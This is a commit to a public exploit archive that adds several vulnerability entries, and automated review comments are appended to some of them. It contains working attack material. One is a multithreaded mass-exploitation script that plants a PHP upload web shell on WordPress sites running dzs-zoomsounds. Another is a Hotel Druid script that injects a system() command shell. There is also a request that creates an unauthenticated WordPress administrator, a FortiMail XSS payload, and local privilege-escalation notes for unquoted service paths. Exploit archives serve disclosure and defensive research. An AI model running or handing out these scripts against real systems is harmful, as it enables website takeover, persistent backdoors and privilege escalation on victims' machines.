DB: 2022-02-19

17 changes to exploits/shellcodes

Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path
TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path
Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path
Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path
File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path
Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path
WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated)
Hotel Druid 3.0.3 - Remote Code Execution (RCE)
Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)

Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode
Solaris/SPARC - chmod(./me) Shellcode
Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode
Linux/MIPS - N32 MSB Reverse Shell Shellcode
This commit is contained in:
Offensive Security 2022-02-19 05:01:36 +00:00
parent a300bd948f
commit f2d7e05ad0
19 changed files with 775 additions and 0 deletions


@ -0,0 +1,24 @@
# Exploit Title: Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)
# Google Dork: inurl:/fmlurlsvc/
# Date: 01-Feb-2022
# Exploit Author: Braiant Giraldo Villa
# Contact: @iron_fortress (Twitter)
# Vendor Homepage: https://www.fortinet.com/products/email-security
# Software Link: https://fortimail.fortidemo.com/m/webmail/ (Vendor Demo Online)
# Version:
# FortiMail version 7.0.1 and below
# FortiMail version 6.4.5 and below
# FortiMail version 6.2.7 and below
# CVE: CVE-2021-43062 (https://www.fortiguard.com/psirt/FG-IR-21-185)
1. Description:
An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
2. Payload: https%3A%2F%google.com%3CSvg%2Fonload%3Dalert(1)%3E
3. Proof of Concept:
https://mydomain.com/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com%3CSvg%2Fonload%3Dalert(1)%3E
4. References
https://www.fortiguard.com/psirt/FG-IR-21-185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43062
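Review bot: The `2. Payload:` line reads `https%3A%2F%google.com%3CSvg...` while the PoC URL two lines later uses `https%3A%2F%2Fgoogle.com%3CSvg...`; one of the two has lost a `2F` and they should agree, since readers copy the payload line. The header lists only affected versions; add the fixed releases from the vendor advisory (not stated here — take them from FG-IR-21-185) so a defender can tell a patched FortiMail from an unpatched one. A one-line statement of the weakness in the header, e.g. `# Weakness: the url parameter of the fmlurlsvc URI protection handler is reflected unescaped (CWE-79)`, would also let the advisory be mapped to the fix without reading the PoC.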


@ -0,0 +1,21 @@
# Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
# Date: 16.02.2022
# Author: Numan Türle
# CVE: CVE-2022-0441
# Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/
# Version: <2.7.6
# https://www.youtube.com/watch?v=SI_O6CHXMZk
# https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6
# https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
Content-Type: application/json
Content-Length: 339
{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}
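Review bot: `# Version: <2.7.6` and the title's `2.7.5` state the affected range two different ways; give both the affected range and the fixing release explicitly, e.g. `# Affected: <= 2.7.5` and `# Fixed in: 2.7.6` (inferred from the `<2.7.6` constraint — confirm against the plugin changelog). The header never describes the weakness itself; a sentence noting that the `stm_lms_register` action appears to honour a caller-supplied `wp_capabilities` value inside `profile_default_fields_for_register` would let defenders map this entry to the vendor fix and to request logging. `Content-Length: 339` is a literal from the author's capture and will not match once the placeholders are replaced; mark it as such or drop it.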

exploits/php/webapps/50753.py Executable file

@ -0,0 +1,111 @@
# Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)
# Google Dork: inurl:wp-content/plugins/dzs-zoomsounds
# Date: 16/02/2022
# Exploit Author: Overthinker1877 (1877 Team)
# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
# Version: 6.60
# Tested on: Windows / Linux
import os
import requests
import threading
from multiprocessing.dummy import Pool,Lock
from bs4 import BeautifulSoup
import time
import smtplib,sys,ctypes
from random import choice
from colorama import Fore
from colorama import Style
from colorama import init
import re
import time
from time import sleep
init(autoreset=True)
fr = Fore.RED
gr = Fore.BLUE
fc = Fore.CYAN
fw = Fore.WHITE
fy = Fore.YELLOW
fg = Fore.GREEN
sd = Style.DIM
sn = Style.NORMAL
sb = Style.BRIGHT
Bad = 0
Good = 0
def Folder(directory):
if not os.path.exists(directory):
os.makedirs(directory)
Folder("exploited")
def clear():
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except:
pass
def finder(i) :
global Bad,Good
head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}
try :
x = requests.session()
listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']
for script in listaa :
url = (i+"/"+script)
while True :
req_first = x.get(url, headers=head)
if "error:http raw post data does not exist" in req_first.text :
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}
burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"
requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)
urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")
req_second = x.get(urlx, headers=head)
if "Overthinker1877" in req_second.text :
Good = Good + 1
print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)
with open("exploited/shell.txt","a") as file :
file.write(urlx+"\n")
file.close()
else :
Bad = Bad + 1
print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")
else :
Bad = Bad + 1
print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")
pass
break
except :
pass
if os.name == 'nt':
ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))
else :
sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))
def key_logo():
clear = '\x1b[0m'
colors = [36, 32, 34, 35, 31, 37]
x = ' [ + ] OVERTHINKER1877 EXPLOIT'
for N, line in enumerate(x.split('\n')):
sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear))
time.sleep(0.05)
def process(line):
time.sleep(1)
def run() :
key_logo()
clear()
print("""
[-] -----------------------------------------[-]
[+] WwW.1877.TeaM
[-] -----------------------------------------[-]
\n \n""")
file_name = input("Website List : ")
op = open(file_name,'r').read().splitlines()
TEXTList = [list.strip() for list in op]
p = Pool(int(input('Thread : ')))
p.map(finder, TEXTList)
run()
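Review bot: Most of the import block is dead — `threading`, `Lock`, `BeautifulSoup`, `smtplib`, `re`, `sleep` are never used and `time` is imported twice — and `bs4`/`colorama` are third-party dependencies the header never lists. `TEXTList = [list.strip() for list in op]` shadows the builtin `list`, `file.close()` is redundant inside the `with` block, and the `while True:` around the request ends in an unconditional `break`, so the loop is scaffolding that never iterates. The header should state the script's side effects, which are persistent: it writes `1877.php` into the target's plugin directory and appends to a local `exploited/shell.txt`; both are also the artefacts a defender would look for. `open(file_name,'r').read()` in `run` is never closed; use a `with` block as `finder` already does.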

exploits/php/webapps/50754.py Executable file

@ -0,0 +1,144 @@
# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)
# Date: 05/01/2022
# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://www.hoteldruid.com/
# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
# Version: 3.0.3
# CVE : CVE-2022-22909
#!/usr/bin/python3
import requests
import argparse
def login( target , username = "" , password = "", noauth=False):
login_data = {
"vers_hinc" : "1",
"nome_utente_phpr" : username,
"password_phpr" : password
}
if not noauth:
login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False )
if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text:
token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('">&nbsp;<b>')[0]
anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
ret_data = {"token" : token , "anno" : anno}
#print("ret data" + ret_data)
return ret_data
else:
return False
else:
login_req = requests.get(f"{target}/inizio.php" , verify=False )
try:
anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
token = ""
ret_data = {"token" : token , "anno" : anno}
return ret_data
except:
return False
def check_privilege(target , anno , token=""):
priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False)
#print(priv_req.text)
if "Modify" in priv_req.text:
return True
else:
return False
def add_room(target , anno , token=""):
add_room_data = {
"anno": anno,
"id_sessione": token,
"n_app":"{${system($_REQUEST['cmd'])}}",
"crea_app":"SI",
"crea_letti":"",
"n_letti":"",
"tipo_tabella":"appartamenti"
}
add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False)
#print(add_req.text)
if "has been added" in add_req.text:
return True
else:
return False
def test_code_execution(target):
code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id")
if "uid=" in code_execution_req.text:
return code_execution_req.text.split("\n")[0]
else:
return False
def main():
banner = """\n /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$
| $$ | $$ | $$ | $$ | $$__ $$ |__/ | $$
| $$ | $$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ \ $$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$
| $$$$$$$$ /$$__ $$|_ $$_/ /$$__ $$| $$ | $$ | $$ /$$__ $$| $$ | $$| $$ /$$__ $$
| $$__ $$| $$ \ $$ | $$ | $$$$$$$$| $$ | $$ | $$| $$ \__/| $$ | $$| $$| $$ | $$
| $$ | $$| $$ | $$ | $$ /$$| $$_____/| $$ | $$ | $$| $$ | $$ | $$| $$| $$ | $$
| $$ | $$| $$$$$$/ | $$$$/| $$$$$$$| $$ | $$$$$$$/| $$ | $$$$$$/| $$| $$$$$$$
|__/ |__/ \______/ \___/ \_______/|__/ |_______/ |__/ \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n"""
parser = argparse.ArgumentParser()
req_args = parser.add_argument_group('required arguments')
req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True)
req_args.add_argument("-u" , "--username" , help="Username" , required=False)
req_args.add_argument("-p" , "--password" , help="password", required=False)
req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False)
args = parser.parse_args()
target = args.target
if target[-1] == "/":
target = target[:-1]
noauth = args.noauth
username = args.username
password = args.password
if noauth == False and (username == None or password == None):
print('[-] Please provide the authentication method.' )
quit()
print(banner)
if not noauth:
print(f"[*] Logging in with the credential {username}:{password}")
login_result = login(username = username , password = password , target = target)
if login_result != False:
token = login_result.get('token')
anno = login_result.get('anno')
else:
print("[-] Login failed, Check your credential or check if login is required or not .")
quit()
else:
print('[*] Trying to access the Dashboard.')
login_result = login(username = username , password = password , target = target , noauth=True)
if login_result != False:
token = login_result.get('token')
anno = login_result.get('anno')
else:
print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.')
exit()
print("[*] Checking the privilege of the user.")
if check_privilege(target= target , token=token , anno=anno):
print("[+] User has the privilege to add room.")
else:
print("[-] User doesn't have the privilege to add room.")
exit()
print("[*] Adding a new room.")
if add_room(target = target , anno=anno , token=token):
print('[+] Room has been added successfully.')
else:
print('[-] Unknown error occured, unable to add room. Maybe the room has already been added')
exit()
print('[*] Testing code exection')
output = test_code_execution(target = target)
if output != False:
print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.")
print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id')
print(f"[+] Example Output : {output}")
exit()
else:
print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname")
exit()
main()
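Review bot: The `#!/usr/bin/python3` line sits after the header comments, so it is not a shebang and the file cannot be run directly; move it to line 1. `quit()` and `exit()` are `site`-module helpers meant for the interactive interpreter; use `sys.exit(1)` on the failure paths and `sys.exit(0)` after success, and guard the entry with `if __name__ == "__main__": main()`. `check_privilege` accepts `anno` but never uses it. The header should also say that the PoC is not read-only: it adds a room whose name is stored by the application, and the `Maybe the room has already been added` message suggests that change persists across runs.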


@ -0,0 +1,35 @@
# Exploit Title: Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/drfone_full3360.exe
# Tested Version: 11.4.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DFWSIDService" | findstr /i /v """
Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto
# Service info:
C:\>sc qc DFWSIDService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DFWSIDService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare WSID help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
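Review bot: The `#Exploit:` paragraph states the precondition but never the remediation; add a line such as `# Fix: quote the service's BINARY_PATH_NAME, e.g. "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe", or have the vendor ship a quoted ImagePath` so the advisory is actionable. The same paragraph is repeated verbatim in the MobileTrans, FamiSafe and UBackit entries of this commit, which have the same gap. The header could also note which path component contains the space (`Wondershare Dr.Fone` here), since that is what a defender checks when auditing services.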


@ -0,0 +1,35 @@
# Exploit Title: Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/mobiletrans_full5793.exe
# Tested Version: 3.5.9
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ElevationService" | findstr /i /v """
Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Auto
# Service info:
C:\>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ElevationService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Driver Install Service help
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.


@ -0,0 +1,35 @@
# Exploit Title: Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download-es.wondershare.com/famisafe_full7869.exe
# Tested Version: 1.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FSService" | findstr /i /v """
FSService FSService C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe Auto
# Service info:
C:\>sc qc FSService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FSService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\FamiSafe\FSService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : FSService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.


@ -0,0 +1,35 @@
# Exploit Title: Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2022-02-17
# Vendor Homepage: https://www.wondershare.com/
# Software Link : https://download.wondershare.com/ubackit_full8767.exe
# Tested Version: 2.0.5
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "wsbackup" | findstr /i /v """
Wondershare wsbackup Service wsbackup C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe Auto
# Service info:
C:\>sc qc wsbackup
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: wsbackup
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Wondershare\Wondershare UBackit\wsbackup.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare wsbackup Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.


@ -0,0 +1,23 @@
#Exploit Title: TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2022-02-17
#Vendor : TOSHIBA
#Version : TOSHIBA Navi Support Service 1.00.0000
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\Users\Administrador>sc qc TNaviSrv
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: TNaviSrv
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD
PLAYER\TNaviSrv.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : TOSHIBA Navi Support Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
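Review bot: The `NOMBRE_RUTA_BINARIO:` value is wrapped onto a second line (`C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD` / `PLAYER\TNaviSrv.exe`), which makes the unquoted path read as two fields; keep it on one line so the space in `TOSHIBA DVD PLAYER` is visibly the issue. The file has no impact or remediation statement at all; a closing line such as `# Fix: quote the service binary path in the service configuration` would make it actionable for defenders. The same wrapping and missing remediation appear in the BlueSoleilCS, Intel LMS, HPFSService and Connectify entries of this commit; the Connectify entry additionally titles the service `'ConnectifyService'` while its `sc qc` output shows the service name is `Connectify` (the executable is ConnectifyService.exe), and the BlueSoleilCS entry lacks an author line. The `sc` output is from a Spanish-locale system; saying so in the header would explain the `CORRECTO`/`NOMBRE_*` labels to readers comparing against English output.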


@ -0,0 +1,25 @@
#Exploit Title: Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path
#Exploit Date: 2022-02-17
#Vendor : IVT Corp
#Version : BlueSoleilCS 5.4.277
#Vendor Homepage : www.ivtcorporation.com
#Tested on OS: Windows 7 Pro
#This software installs EDTService.exe version 11.10.2.1
#Analyze PoC :
==============
C:\>sc qc BlueSoleilCS
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: BlueSoleilCS
TIPO : 120 WIN32_SHARE_PROCESS (interactive)
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IVT
Corporation\BlueSoleil\BlueSoleilCS.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : BlueSoleilCS
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem


@ -0,0 +1,26 @@
#Exploit Title: Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2022-02-17
#Vendor : Intel
#Version : Intel(R) Management Engine Components 6.0.0.1189
#Vendor Homepage : https://www.intel.com
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc LMS
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: LMS
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel(R)
Management Engine Components\LMS\LMS.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Intel(R) Management and Security Application
Local Management Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem


@ -0,0 +1,25 @@
#Exploit Title: File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2022-02-14
#Vendor : Hewlett-Packard(HP)
#Version : File Sanitizer for HP ProtectTools 5.0.1.3
#Vendor Homepage : http://www.hp.com
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc HPFSService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: HPFSService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Hewlett-Packard\File
Sanitizer\HPFSService.exe
GRUPO_ORDEN_CARGA : File System
ETIQUETA : 0
NOMBRE_MOSTRAR : File Sanitizer for HP ProtectTools
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem


@ -0,0 +1,27 @@
#Exploit Title: Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2022-02-17
#Vendor : Connectify Inc
#Version : Connectify Hotspot 2018
#Vendor Homepage : https://www.connectify.me/
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc Connectify
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Connectify
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Connectify\ConnectifyService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Connectify Hotspot 2018
DEPENDENCIAS : wlansvc
: winmgmt
: http
NOMBRE_INICIO_SERVICIO: LocalSystem


@ -11441,6 +11441,15 @@ id,file,description,date,author,type,platform,port
50728,exploits/windows/local/50728.txt,"Cain & Abel 4.9.56 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows,
50743,exploits/windows/local/50743.txt,"TeamSpeak 3.5.6 - Insecure File Permissions",1970-01-01,"Aryan Chehreghani",local,windows,
50745,exploits/windows/local/50745.txt,"Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
50755,exploits/windows/local/50755.txt,"Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
50756,exploits/windows/local/50756.txt,"Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
50757,exploits/windows/local/50757.txt,"Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
50758,exploits/windows/local/50758.txt,"Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
50760,exploits/windows/local/50760.txt,"TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
50761,exploits/windows/local/50761.txt,"Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
50762,exploits/windows/local/50762.txt,"Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
50763,exploits/windows/local/50763.txt,"File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
50764,exploits/windows/local/50764.txt,"Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path",1970-01-01,SamAlucard,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -44821,3 +44830,7 @@ id,file,description,date,author,type,platform,port
50741,exploits/multiple/webapps/50741.py,"ServiceNow - Username Enumeration",1970-01-01,"Victor Hanna",webapps,multiple,
50744,exploits/hardware/webapps/50744.txt,"Network Video Recorder NVR304-16EP - Reflected Cross-Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Luis Martínez",webapps,hardware,
50746,exploits/php/webapps/50746.txt,"WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,
50752,exploits/php/webapps/50752.txt,"WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation",1970-01-01,"numan türle",webapps,php,
50753,exploits/php/webapps/50753.py,"WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Overthinker1877,webapps,php,
50754,exploits/php/webapps/50754.py,"Hotel Druid 3.0.3 - Remote Code Execution (RCE)",1970-01-01,0z09e,webapps,php,
50759,exploits/multiple/webapps/50759.txt,"Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Braiant Giraldo Villa",webapps,multiple,



@ -1046,3 +1046,7 @@ id,file,description,date,author,type,platform
50710,shellcodes/windows_x86/50710.asm,"Windows/x86 - Download File and Execute / Dynamic PEB & EDT method Shellcode (458 bytes)",1970-01-01,Techryptic,shellcode,windows_x86
50711,shellcodes/windows_x86/50711.asm,"Windows/x86 - Locate kernel32 base address / Memory Sieve method Shellcode (133 bytes)",1970-01-01,"Tarek Ahmed",shellcode,windows_x86
